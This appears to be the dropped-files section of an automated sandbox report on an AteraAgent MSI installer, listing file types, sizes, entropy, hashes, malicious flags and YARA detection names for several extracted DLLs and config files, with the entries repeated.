                                                                                                                                                                                                                                                                                              SHA-256:27F1CDF3422C4C87D9D273A62DF4404339119E416D16D8512479D87ACD07C12B
                                                                                                                                                                                                                                                                                              SHA-512:DFB7CDE9198FE29E9B8738AB2DDCA34DB87C3BE6D9EB1C68E507FFB59F4F9E66761AB84A1E40B4FA040AA061F214C2E2EA1EFCFC875BCCA44BDF947639EF10ED
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2994176
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.878673655295741
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:a+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:a+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                                                                              MD5:7CE6669643890D209540D68E76C0CFCC
                                                                                                                                                                                                                                                                                              SHA1:C49DF2E823D5E2461A11C96AD4D36974C7FFFC9A
                                                                                                                                                                                                                                                                                              SHA-256:27F1CDF3422C4C87D9D273A62DF4404339119E416D16D8512479D87ACD07C12B
                                                                                                                                                                                                                                                                                              SHA-512:DFB7CDE9198FE29E9B8738AB2DDCA34DB87C3BE6D9EB1C68E507FFB59F4F9E66761AB84A1E40B4FA040AA061F214C2E2EA1EFCFC875BCCA44BDF947639EF10ED
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: x64;1033, Revision Number: {911E9E2F-B38D-4D02-A148-5E49FC9D8943}, Create Time/Date: Wed Feb 28 10:52:04 2024, Last Saved Time/Date: Wed Feb 28 10:52:04 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2994176
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.878630966889847
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:s+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oq1xMbY+K/tzQz:s+lUlz9FKbsodq0YaH7Z1xMb8tT
                                                                                                                                                                                                                                                                                              MD5:5E90226ABB5A004B0B9DB9A9E67BAC21
                                                                                                                                                                                                                                                                                              SHA1:34EB703055BAFA469A714F18C7F00E5098B764AF
                                                                                                                                                                                                                                                                                              SHA-256:BE0C53481ED4CF3EC4D0AD16053CD18D6AAD8C349B8281F5F9B90B526420CEAE
                                                                                                                                                                                                                                                                                              SHA-512:2676357D10AA76F09F2A1F691C7566D54E34B20716EDF1301B2D69C3E3400D0A70E7C1738AEA9A75334B384AB988CEA3A07B983C900AE32395285BE61673C288
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):521954
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                              MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                              SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                              SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                              SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25600
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                              MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                              SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                              SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                              SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI2D79.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1538
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                              MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                              SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                              SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                              SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):184240
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                              MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                              SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                              SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                              SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):711952
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                              MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                              SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                              SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                              SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):61448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                              MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                              SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                              SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                              SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):521954
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                              MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                              SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                              SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                              SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25600
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                              MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                              SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                              SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                              SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI2FBD.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1538
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                              MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                              SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                              SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                              SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):184240
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                              MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                              SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                              SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                              SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):711952
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                              MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                              SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                              SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                              SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):61448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                              MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                              SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                              SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                              SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):521954
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                              MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                              SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                              SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                              SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25600
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                              MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                              SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                              SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                              SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI3FBB.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1538
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                              MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                              SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                              SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                              SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):184240
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                              MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                              SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                              SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                              SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):711952
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                              MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                              SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                              SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                              SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):61448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                              MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                              SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                              SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                              SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                              Malicious:false
